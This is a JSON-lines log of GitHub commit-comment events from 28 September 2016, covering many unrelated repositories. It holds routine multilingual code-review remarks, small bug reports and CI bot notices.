{"id":"4629963927","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19205630,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T11:06:10Z","updated_at":"2016-09-28T11:06:10Z","body":"But, if we use Backbone and Yii functions as a REST server, we are basically moving the CRUD functionality to Javascript."}},"created_at":"2016-09-28T11:06:10Z"}
{"id":"4629964960","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":19205633,"position":null,"line":null,"path":null,"commit_id":"ab16000af4ea2c928ded30ee6a9286a05ba7b8d3","created_at":"2016-09-28T11:06:25Z","updated_at":"2016-09-28T11:06:25Z","body":"Lapras T_T"}},"created_at":"2016-09-28T11:06:25Z"}
{"id":"4629966659","type":"CommitCommentEvent","actor":{"login":"GaryJones"},"repo":{"name":"WCLDN/2017-theme"},"payload":{"comment":{"id":19205637,"position":5,"line":5,"path":".gitignore","commit_id":"61605e205585ea6ebf299e2af168313dc9406101","created_at":"2016-09-28T11:06:49Z","updated_at":"2016-09-28T11:06:49Z","body":"This, and `.sass-cache`, should be in your global gitignore, not on a per project ignore."}},"created_at":"2016-09-28T11:06:49Z"}
{"id":"4629967219","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19205640,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T11:06:58Z","updated_at":"2016-09-28T11:06:58Z","body":"The question is the if we have to duplicate the model classes, to have them both in Yii and Backbone."}},"created_at":"2016-09-28T11:06:58Z"}
{"id":"4629968017","type":"CommitCommentEvent","actor":{"login":"primus-anonymous"},"repo":{"name":"ShtefanES/Rest"},"payload":{"comment":{"id":19205643,"position":34,"line":34,"path":"src/ru/neoanon/servlets/HolderServlet.java","commit_id":"4ccbb1ac96148785555b09e7c827ffac1cc5c328","created_at":"2016-09-28T11:07:10Z","updated_at":"2016-09-28T11:07:10Z","body":"Збс"}},"created_at":"2016-09-28T11:07:10Z"}
{"id":"4629968667","type":"CommitCommentEvent","actor":{"login":"pallavi-rao"},"repo":{"name":"InMobi/falcon"},"payload":{"comment":{"id":19205644,"position":94,"line":394,"path":"prism/src/main/java/org/apache/falcon/service/EntitySLAMonitoringService.java","commit_id":"cd04566721a2a82c00ba1b6e9d331536adfe7b84","created_at":"2016-09-28T11:07:19Z","updated_at":"2016-09-28T11:07:19Z","body":"Better to use a different variable and not modify the method argument."}},"created_at":"2016-09-28T11:07:19Z"}
{"id":"4629969407","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19205647,"position":null,"line":null,"path":null,"commit_id":"bc621888f76d46f57aea54af63b254a4a7f220a9","created_at":"2016-09-28T11:07:29Z","updated_at":"2016-09-28T11:07:29Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cl9ZMooAS3SvkSfIQXCyYw"}},"created_at":"2016-09-28T11:07:29Z"}
{"id":"4629971900","type":"CommitCommentEvent","actor":{"login":"primus-anonymous"},"repo":{"name":"ShtefanES/Rest"},"payload":{"comment":{"id":19205653,"position":85,"line":85,"path":"src/ru/neoanon/servlets/HolderServlet.java","commit_id":"4ccbb1ac96148785555b09e7c827ffac1cc5c328","created_at":"2016-09-28T11:08:03Z","updated_at":"2016-09-28T11:08:03Z","body":"можешь сразу return сделать тут"}},"created_at":"2016-09-28T11:08:03Z"}
{"id":"4629974300","type":"CommitCommentEvent","actor":{"login":"prithsharma"},"repo":{"name":"cvquant/react-native-instabug"},"payload":{"comment":{"id":19205657,"position":null,"line":null,"path":null,"commit_id":"9b464af9e1ea4d86e5a1777f8a0be36540eb2aa3","created_at":"2016-09-28T11:08:37Z","updated_at":"2016-09-28T11:08:37Z","body":"Sure."}},"created_at":"2016-09-28T11:08:37Z"}
{"id":"4629974526","type":"CommitCommentEvent","actor":{"login":"jfportalb"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19205658,"position":20,"line":27,"path":"Assets/Scripts/View/Visar3DDynamic.cs","commit_id":"312c8f38ca9be7a5d4428f458efd574553780706","created_at":"2016-09-28T11:08:40Z","updated_at":"2016-09-28T11:08:40Z","body":"A declaração do tipo sobrescrevia a variável global, impedindo ela de ser usada em outras funções"}},"created_at":"2016-09-28T11:08:40Z"}
{"id":"4629975439","type":"CommitCommentEvent","actor":{"login":"atd"},"repo":{"name":"P2Pvalue/teem"},"payload":{"comment":{"id":19205661,"position":null,"line":null,"path":null,"commit_id":"5a9d7ff65a1b9e31fc9f75aaedb1fde7a1e64573","created_at":"2016-09-28T11:08:52Z","updated_at":"2016-09-28T11:08:52Z","body":":+1: thank you @llopv "}},"created_at":"2016-09-28T11:08:52Z"}
{"id":"4629979389","type":"CommitCommentEvent","actor":{"login":"jfportalb"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19205676,"position":55,"line":56,"path":"Assets/Scripts/View/Visar3DDynamic.cs","commit_id":"312c8f38ca9be7a5d4428f458efd574553780706","created_at":"2016-09-28T11:09:49Z","updated_at":"2016-09-28T11:09:49Z","body":"Apenas para simplificar no caso de querer colocar um packageDiagram na origem não precisar especificar. Mera praticidade, mas não está sendo utilizado"}},"created_at":"2016-09-28T11:09:49Z"}
{"id":"4629982475","type":"CommitCommentEvent","actor":{"login":"primus-anonymous"},"repo":{"name":"ShtefanES/Rest"},"payload":{"comment":{"id":19205680,"position":3,"line":3,"path":"src/ru/neoanon/service/PostAttributes.java","commit_id":"3a2f7624b96de02816f61f53a220431262257c02","created_at":"2016-09-28T11:10:32Z","updated_at":"2016-09-28T11:10:32Z","body":"Ежели это запрос на снятие деньгов, к примеру, то и называй его WithrawRequest"}},"created_at":"2016-09-28T11:10:32Z"}
{"id":"4629985633","type":"CommitCommentEvent","actor":{"login":"valentintureac"},"repo":{"name":"js-hacks/jshacks.io"},"payload":{"comment":{"id":19205688,"position":1,"line":1,"path":"_includes/base/header.html","commit_id":"5dd512fc249379b91355e89fbeca4e3516a5c1aa","created_at":"2016-09-28T11:11:17Z","updated_at":"2016-09-28T11:11:17Z","body":"So people really do read commit messages. Darn."}},"created_at":"2016-09-28T11:11:17Z"}
{"id":"4629987243","type":"CommitCommentEvent","actor":{"login":"primus-anonymous"},"repo":{"name":"ShtefanES/Rest"},"payload":{"comment":{"id":19205696,"position":6,"line":6,"path":"src/ru/neoanon/service/PostAttributes.java","commit_id":"3a2f7624b96de02816f61f53a220431262257c02","created_at":"2016-09-28T11:11:41Z","updated_at":"2016-09-28T11:11:41Z","body":"Чтобы ты знал просто у Gson есть такая аннотация http://stackoverflow.com/questions/28957285/what-is-the-basic-purpose-of-serializedname-annotation-in-android-using-gson \r\nпозволит при необходимости решить проблему корявых имен vs code style"}},"created_at":"2016-09-28T11:11:41Z"}
{"id":"4629987434","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19205697,"position":null,"line":null,"path":null,"commit_id":"3f9c1412f5d7713b23a7c0203a688cda6dcaeef3","created_at":"2016-09-28T11:11:44Z","updated_at":"2016-09-28T11:11:44Z","body":"This idea seems very promising! Good luck!"}},"created_at":"2016-09-28T11:11:44Z"}
{"id":"4629991911","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19205703,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T11:12:48Z","updated_at":"2016-09-28T11:12:48Z","body":"The question is when will we do it, and how will we do it? \r\nlast flame for me. "}},"created_at":"2016-09-28T11:12:48Z"}
{"id":"4629993831","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19205709,"position":null,"line":null,"path":null,"commit_id":"6bb75ca928e42a3d3b0f9793392480b257688843","created_at":"2016-09-28T11:13:16Z","updated_at":"2016-09-28T11:13:16Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 278](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1252&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **SUCCESS**\nSummary: Running Build time: 00:28:35"}},"created_at":"2016-09-28T11:13:16Z"}
{"id":"4629995840","type":"CommitCommentEvent","actor":{"login":"primus-anonymous"},"repo":{"name":"ShtefanES/Rest"},"payload":{"comment":{"id":19205715,"position":51,"line":51,"path":"src/ru/neoanon/servlets/ChargeServlet.java","commit_id":"3a2f7624b96de02816f61f53a220431262257c02","created_at":"2016-09-28T11:13:47Z","updated_at":"2016-09-28T11:13:47Z","body":"абс"}},"created_at":"2016-09-28T11:13:47Z"}
{"id":"4629998145","type":"CommitCommentEvent","actor":{"login":"ArmandH"},"repo":{"name":"ccrisan/streameye"},"payload":{"comment":{"id":19205721,"position":null,"line":null,"path":null,"commit_id":"88fc2a5ce9a61c820b07df3578ce8546c0609e4c","created_at":"2016-09-28T11:14:21Z","updated_at":"2016-09-28T11:14:21Z","body":"Hi,\r\n\r\nDo i do something wrong or is there a bug?\r\n\r\nroot@raspcam:/home/pi# raspimjpeg.py --s_height 1920 --s_width 1080 -r 15 -q 40 | streameye\r\n2016-09-28 11:12:19: INFO : streamEye 0.7\r\n2016-09-28 11:12:19: INFO : hello!\r\n2016-09-28 11:12:19: INFO : listening on 0.0.0.0:8080\r\nusage: raspimjpeg.py -w WIDTH -h HEIGHT -r FRAMERATE [options]\r\nraspimjpeg.py: error: option width: a value is required\r\n2016-09-28 11:12:20: INFO : bye!"}},"created_at":"2016-09-28T11:14:21Z"}
{"id":"4630000614","type":"CommitCommentEvent","actor":{"login":"skovhus"},"repo":{"name":"avajs/ava-codemods"},"payload":{"comment":{"id":19205725,"position":null,"line":null,"path":null,"commit_id":"eb122c981514386e318e2b68479eccc8a9f809e7","created_at":"2016-09-28T11:14:54Z","updated_at":"2016-09-28T11:14:54Z","body":"This doesn't work for me. `multimatch` does not work on paths. \r\n\r\n``` \r\n> var multimatch = require('multimatch')\r\n> multimatch(['unicorn/foo/baz.js', 'cake', 'rainbows/baz'], ['*', '!cake']); \r\n[]\r\n```\r\n"}},"created_at":"2016-09-28T11:14:54Z"}
{"id":"4630001341","type":"CommitCommentEvent","actor":{"login":"caosenvip"},"repo":{"name":"caosenvip/learngit"},"payload":{"comment":{"id":19205726,"position":null,"line":null,"path":null,"commit_id":"edd7070045ccb455e381c65f5d62099e8288fa5a","created_at":"2016-09-28T11:15:05Z","updated_at":"2016-09-28T11:15:05Z","body":"1223"}},"created_at":"2016-09-28T11:15:05Z"}
{"id":"4630002302","type":"CommitCommentEvent","actor":{"login":"jfportalb"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19205728,"position":22,"line":29,"path":"Assets/Scripts/View/Visar3DDynamic.cs","commit_id":"312c8f38ca9be7a5d4428f458efd574553780706","created_at":"2016-09-28T11:15:18Z","updated_at":"2016-09-28T11:15:18Z","body":"Testei várias vezes e não estava dando nenhum problema. O Objeto do PackageDiagram estava com o script certinho?"}},"created_at":"2016-09-28T11:15:18Z"}
{"id":"4630002648","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Pheophorbide/page-test"},"payload":{"comment":{"id":19205730,"position":null,"line":null,"path":null,"commit_id":"71c5577957184a68351f422836c60a92b12542d3","created_at":"2016-09-28T11:15:24Z","updated_at":"2016-09-28T11:15:24Z","body":"product-img.png без картинки не обойтись?)"}},"created_at":"2016-09-28T11:15:24Z"}
{"id":"4630002908","type":"CommitCommentEvent","actor":{"login":"jasonliul"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19205732,"position":null,"line":null,"path":null,"commit_id":"206273ce32e2d0fd528b7e7aa6d5a154d30154dd","created_at":"2016-09-28T11:15:27Z","updated_at":"2016-09-28T11:15:27Z","body":"@henrypp \r\nJordan give it to me, this should work.\r\n\r\n"}},"created_at":"2016-09-28T11:15:27Z"}
{"id":"4630006086","type":"CommitCommentEvent","actor":{"login":"davidcernat"},"repo":{"name":"TES3MP/openmw-tes3mp"},"payload":{"comment":{"id":19205738,"position":null,"line":null,"path":null,"commit_id":"b6086ab015fe75cc0ca286c039d68248423d232b","created_at":"2016-09-28T11:16:12Z","updated_at":"2016-09-28T11:16:12Z","body":"I strongly considered having two packets for dynamic stats as described in #66, but ultimately decided against it and this commit was the result."}},"created_at":"2016-09-28T11:16:12Z"}
{"id":"4630006905","type":"CommitCommentEvent","actor":{"login":"anamarialazar"},"repo":{"name":"lazarelena/SearchAI"},"payload":{"comment":{"id":19205740,"position":51,"line":27,"path":"src/AppBundle/Controller/SearchController.php","commit_id":"f89e759c0cde25ce199a87a1f8effa2a6ccd10f9","created_at":"2016-09-28T11:16:24Z","updated_at":"2016-09-28T11:16:24Z","body":"use a service for each API "}},"created_at":"2016-09-28T11:16:24Z"}
{"id":"4630009307","type":"CommitCommentEvent","actor":{"login":"adamgit"},"repo":{"name":"SVGKit/SVGKit"},"payload":{"comment":{"id":19205744,"position":14,"line":161,"path":"Source/DOM classes/SVG-DOM/SVGLength.m","commit_id":"6045d38f17bfe4ff5b69fe35633ef961fce02891","created_at":"2016-09-28T11:16:58Z","updated_at":"2016-09-28T11:16:58Z","body":"Please send a pull request. I'm not on a mac, I had to trust that OP had\nactually pressed build before submitting!\n\n(I read the diff before merging it, but didn't spot the typo :( )\n\nOn 28 September 2016 at 11:18, Arnaud Schildknecht <notifications@github.com\n> wrote:\n\n> There is a typo error here making the build fail. Should be [[platform\n> hasPrefix:@\"iPhone9,4\"].\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/SVGKit/SVGKit/commit/6045d38f17bfe4ff5b69fe35633ef961fce02891#commitcomment-19205198>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAR1-Yw3u2xjSYvTp__u8YEB8XGFtR2gks5quj7ygaJpZM4KIpdV>\n> .\n>\n"}},"created_at":"2016-09-28T11:16:58Z"}
{"id":"4630011710","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205750,"position":null,"line":null,"path":null,"commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:17:34Z","updated_at":"2016-09-28T11:17:34Z","body":"Зачем сколько кода в коммите? `bower_components` вообще зачем в проекте?"}},"created_at":"2016-09-28T11:17:34Z"}
{"id":"4630012940","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19205752,"position":null,"line":null,"path":null,"commit_id":"e746edaeb9f431e7b5f0ceb1abaf0d152971e922","created_at":"2016-09-28T11:17:52Z","updated_at":"2016-09-28T11:17:52Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#eQZR1oQ1SRetwGlvqwjFqQ"}},"created_at":"2016-09-28T11:17:52Z"}
{"id":"4630016960","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205764,"position":20,"line":20,"path":"src/pug/layout.pug","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:18:50Z","updated_at":"2016-09-28T11:18:50Z","body":"Хороший выбор, но нам при сборке надо всё собирать в папку js)"}},"created_at":"2016-09-28T11:18:50Z"}
{"id":"4630017982","type":"CommitCommentEvent","actor":{"login":"anamarialazar"},"repo":{"name":"lazarelena/SearchAI"},"payload":{"comment":{"id":19205769,"position":8,"line":8,"path":"src/AppBundle/GoogleBooksAPI.php","commit_id":"f89e759c0cde25ce199a87a1f8effa2a6ccd10f9","created_at":"2016-09-28T11:19:03Z","updated_at":"2016-09-28T11:19:03Z","body":"add a search function\r\n"}},"created_at":"2016-09-28T11:19:03Z"}
{"id":"4630018778","type":"CommitCommentEvent","actor":{"login":"anamarialazar"},"repo":{"name":"lazarelena/SearchAI"},"payload":{"comment":{"id":19205770,"position":7,"line":7,"path":"src/AppBundle/GoodReadsAPI.php","commit_id":"f89e759c0cde25ce199a87a1f8effa2a6ccd10f9","created_at":"2016-09-28T11:19:13Z","updated_at":"2016-09-28T11:19:13Z","body":"add a search function\r\n"}},"created_at":"2016-09-28T11:19:13Z"}
{"id":"4630019933","type":"CommitCommentEvent","actor":{"login":"anamarialazar"},"repo":{"name":"lazarelena/SearchAI"},"payload":{"comment":{"id":19205773,"position":35,"line":35,"path":"src/AppBundle/Entity/Book.php","commit_id":"f89e759c0cde25ce199a87a1f8effa2a6ccd10f9","created_at":"2016-09-28T11:19:29Z","updated_at":"2016-09-28T11:19:29Z","body":"Setteri / getter?\r\n"}},"created_at":"2016-09-28T11:19:29Z"}
{"id":"4630020125","type":"CommitCommentEvent","actor":{"login":"preetsaimutneja"},"repo":{"name":"Microsoft/vsts-tasks"},"payload":{"comment":{"id":19205774,"position":null,"line":null,"path":null,"commit_id":"1f2f7c91bd3765dcd08e6fff8d58bd3ebc803d9e","created_at":"2016-09-28T11:19:32Z","updated_at":"2016-09-28T11:19:32Z","body":"I got `Unable to find tests using the following pattern` error when I ran `node make.js testLegacy --suite L0/VStest` after this commit"}},"created_at":"2016-09-28T11:19:32Z"}
{"id":"4630020266","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19205775,"position":null,"line":null,"path":null,"commit_id":"3cd020babadfc51fa2ee47d27f2a9faed413716b","created_at":"2016-09-28T11:19:34Z","updated_at":"2016-09-28T11:19:34Z","body":"I think it's because he put creature and not creature_template"}},"created_at":"2016-09-28T11:19:34Z"}
{"id":"4630022464","type":"CommitCommentEvent","actor":{"login":"DenEvp"},"repo":{"name":"DenEvp/testRepository"},"payload":{"comment":{"id":19205777,"position":2,"line":2,"path":"README.md","commit_id":"6126a9df08bfbe84ac51a1a7992152c1614ae0af","created_at":"2016-09-28T11:20:06Z","updated_at":"2016-09-28T11:20:06Z","body":"some some"}},"created_at":"2016-09-28T11:20:06Z"}
{"id":"4630022517","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205778,"position":1,"line":1,"path":"src/pug/components/seach-field.pug","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:20:07Z","updated_at":"2016-09-28T11:20:07Z","body":"формой с сабмитом не логичнее сделать?)"}},"created_at":"2016-09-28T11:20:07Z"}
{"id":"4630023577","type":"CommitCommentEvent","actor":{"login":"anamarialazar"},"repo":{"name":"lazarelena/SearchAI"},"payload":{"comment":{"id":19205780,"position":69,"line":44,"path":"src/AppBundle/Controller/SearchController.php","commit_id":"f89e759c0cde25ce199a87a1f8effa2a6ccd10f9","created_at":"2016-09-28T11:20:20Z","updated_at":"2016-09-28T11:20:20Z","body":"parcursul folderului si inseratul tb sa aiba loc Import"}},"created_at":"2016-09-28T11:20:20Z"}
{"id":"4630026176","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205785,"position":43,"line":43,"path":"src/pug/components/masonry.pug","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:20:55Z","updated_at":"2016-09-28T11:20:55Z","body":"отдельный элемент? Псевдоэлементы нам в помощь)"}},"created_at":"2016-09-28T11:20:55Z"}
{"id":"4630027621","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205789,"position":40,"line":40,"path":"src/pug/components/masonry.pug","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:21:16Z","updated_at":"2016-09-28T11:21:16Z","body":"а без картинки никак?"}},"created_at":"2016-09-28T11:21:16Z"}
{"id":"4630029476","type":"CommitCommentEvent","actor":{"login":"kovalskyy"},"repo":{"name":"kovalskyy/iOS-course---calculator"},"payload":{"comment":{"id":19205790,"position":null,"line":null,"path":null,"commit_id":"cd444fc884d781187cc7aac98f7aaefa2805c05c","created_at":"2016-09-28T11:21:45Z","updated_at":"2016-09-28T11:21:45Z","body":"Have done a simple calculator following the steps in the iOS course. Added a clear function(button) on my own."}},"created_at":"2016-09-28T11:21:45Z"}
{"id":"4630031144","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.upgrade"},"payload":{"comment":{"id":19205793,"position":null,"line":null,"path":null,"commit_id":"c1a1f2dd6b944efe3a425562859d984b92d95b33","created_at":"2016-09-28T11:22:09Z","updated_at":"2016-09-28T11:22:09Z","body":"Michael Graf your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-28T11:22:09Z"}
{"id":"4630034153","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205801,"position":39,"line":39,"path":"src/pug/components/inspirations.pug","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:22:51Z","updated_at":"2016-09-28T11:22:51Z","body":"`inspirations_mobile` блок или элемент? `only-mobile` — модификатор?"}},"created_at":"2016-09-28T11:22:51Z"}
{"id":"4630035431","type":"CommitCommentEvent","actor":{"login":"stephentoub"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19205804,"position":64,"line":86,"path":"src/System.ComponentModel.TypeConverter/ref/System.ComponentModel.cs","commit_id":"a49598d26c6da7b2468dd1cc41458691d8765228","created_at":"2016-09-28T11:23:08Z","updated_at":"2016-09-28T11:23:08Z","body":"Why is this commented out rather than deleted?"}},"created_at":"2016-09-28T11:23:08Z"}
{"id":"4630035705","type":"CommitCommentEvent","actor":{"login":"lazarelena"},"repo":{"name":"lazarelena/SearchAI"},"payload":{"comment":{"id":19205805,"position":7,"line":7,"path":"src/AppBundle/GoodReadsAPI.php","commit_id":"f89e759c0cde25ce199a87a1f8effa2a6ccd10f9","created_at":"2016-09-28T11:23:13Z","updated_at":"2016-09-28T11:23:13Z","body":"you mean renaming the function from requestAction to search ?"}},"created_at":"2016-09-28T11:23:13Z"}
{"id":"4630036164","type":"CommitCommentEvent","actor":{"login":"Hoodedgull"},"repo":{"name":"Hoodedgull/ChangingColors"},"payload":{"comment":{"id":19205813,"position":null,"line":null,"path":null,"commit_id":"9672e9082aa881f2c0503191020c8308a12a7296","created_at":"2016-09-28T11:23:19Z","updated_at":"2016-09-28T11:23:19Z","body":"This looks amazing!!!!"}},"created_at":"2016-09-28T11:23:19Z"}
{"id":"4630037039","type":"CommitCommentEvent","actor":{"login":"DmitryTsyganov"},"repo":{"name":"RmRfBereza/Server"},"payload":{"comment":{"id":19205817,"position":47,"line":47,"path":"Assets/YControllers.cs","commit_id":"da786b7d5b35d6b8949c066afd11efb1cd6997a7","created_at":"2016-09-28T11:23:32Z","updated_at":"2016-09-28T11:23:32Z","body":"в Update лучше не писать код, а вынести его в функции с говорящими названиями, чтобы сразу было понятно, что происходит на каждом тике"}},"created_at":"2016-09-28T11:23:32Z"}
{"id":"4630037300","type":"CommitCommentEvent","actor":{"login":"lazarelena"},"repo":{"name":"lazarelena/SearchAI"},"payload":{"comment":{"id":19205818,"position":8,"line":8,"path":"src/AppBundle/GoogleBooksAPI.php","commit_id":"f89e759c0cde25ce199a87a1f8effa2a6ccd10f9","created_at":"2016-09-28T11:23:37Z","updated_at":"2016-09-28T11:23:37Z","body":"requestAction ->search ?"}},"created_at":"2016-09-28T11:23:37Z"}
{"id":"4630041505","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19205829,"position":null,"line":null,"path":null,"commit_id":"3cd020babadfc51fa2ee47d27f2a9faed413716b","created_at":"2016-09-28T11:24:33Z","updated_at":"2016-09-28T11:24:33Z","body":"yep - need to fix"}},"created_at":"2016-09-28T11:24:33Z"}
{"id":"4630041538","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19205830,"position":null,"line":null,"path":null,"commit_id":"439785d9d233fbb6fb2f5f00bf7faa64f27445a0","created_at":"2016-09-28T11:24:34Z","updated_at":"2016-09-28T11:24:34Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#D2NMTdS8RLGlmHIefUJROA"}},"created_at":"2016-09-28T11:24:34Z"}
{"id":"4630043093","type":"CommitCommentEvent","actor":{"login":"DmitryTsyganov"},"repo":{"name":"RmRfBereza/Server"},"payload":{"comment":{"id":19205832,"position":36,"line":36,"path":"Assets/YControllers.cs","commit_id":"da786b7d5b35d6b8949c066afd11efb1cd6997a7","created_at":"2016-09-28T11:24:56Z","updated_at":"2016-09-28T11:24:56Z","body":"Вся математика в Unity хранится в Mathf\r\nMathf.Abs()"}},"created_at":"2016-09-28T11:24:56Z"}
{"id":"4630043527","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.server"},"payload":{"comment":{"id":19205834,"position":null,"line":null,"path":null,"commit_id":"d4c8124863b52f2ed59cc70483bc33efe7a2204c","created_at":"2016-09-28T11:25:00Z","updated_at":"2016-09-28T11:25:00Z","body":"Ramon Navarro Bosch your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-28T11:25:00Z"}
{"id":"4630044651","type":"CommitCommentEvent","actor":{"login":"lazarelena"},"repo":{"name":"lazarelena/SearchAI"},"payload":{"comment":{"id":19205835,"position":69,"line":44,"path":"src/AppBundle/Controller/SearchController.php","commit_id":"f89e759c0cde25ce199a87a1f8effa2a6ccd10f9","created_at":"2016-09-28T11:25:14Z","updated_at":"2016-09-28T11:25:14Z","body":"folder ul este parcurs in Import\r\ninsercatul in ce? ca nu am facut inca baza de date"}},"created_at":"2016-09-28T11:25:14Z"}
{"id":"4630046562","type":"CommitCommentEvent","actor":{"login":"j0tunn"},"repo":{"name":"nginx-modules/ngx_http_extended_status_module"},"payload":{"comment":{"id":19205842,"position":512,"line":512,"path":"extended_status-1.10.1.patch","commit_id":"cfed5b3098495ab1b9e7f3217d2353d6526bc202","created_at":"2016-09-28T11:25:39Z","updated_at":"2016-09-28T11:25:39Z","body":"this line leads to compile errors: `no member named 'response_sec'` and `no member named 'response_msec'`\r\nI think this should work:\r\n```c\r\nms = state[i].response_time;\r\n```"}},"created_at":"2016-09-28T11:25:39Z"}
{"id":"4630049758","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205848,"position":3,"line":3,"path":"src/pug/components/footer.pug","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:26:25Z","updated_at":"2016-09-28T11:26:25Z","body":"заголовок по семантике, а не просто див"}},"created_at":"2016-09-28T11:26:25Z"}
{"id":"4630051461","type":"CommitCommentEvent","actor":{"login":"gjuchault"},"repo":{"name":"buckless/Server"},"payload":{"comment":{"id":19205851,"position":null,"line":null,"path":null,"commit_id":"69818de1c7abab5b5db72914e97dea2aecaee854","created_at":"2016-09-28T11:26:50Z","updated_at":"2016-09-28T11:26:50Z","body":":goat:"}},"created_at":"2016-09-28T11:26:50Z"}
{"id":"4630052228","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19205855,"position":null,"line":null,"path":null,"commit_id":"6f42b848fae86da12e7e4341a2d8d2975abb3d8c","created_at":"2016-09-28T11:27:00Z","updated_at":"2016-09-28T11:27:00Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/547/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2115)."}},"created_at":"2016-09-28T11:27:00Z"}
{"id":"4630053108","type":"CommitCommentEvent","actor":{"login":"rosepriya-jk"},"repo":{"name":"Saulis/iron-data-table"},"payload":{"comment":{"id":19205856,"position":71,"line":708,"path":"iron-data-table.html","commit_id":"5af85ef1377c69e802cb552ed8d9a47ef214a937","created_at":"2016-09-28T11:27:12Z","updated_at":"2016-09-28T11:27:12Z","body":"@Saulis the _loadPage is being invoked once by default and the other 2 conditionally. We came across a case where it gets triggered twice. Is it intentional?"}},"created_at":"2016-09-28T11:27:12Z"}
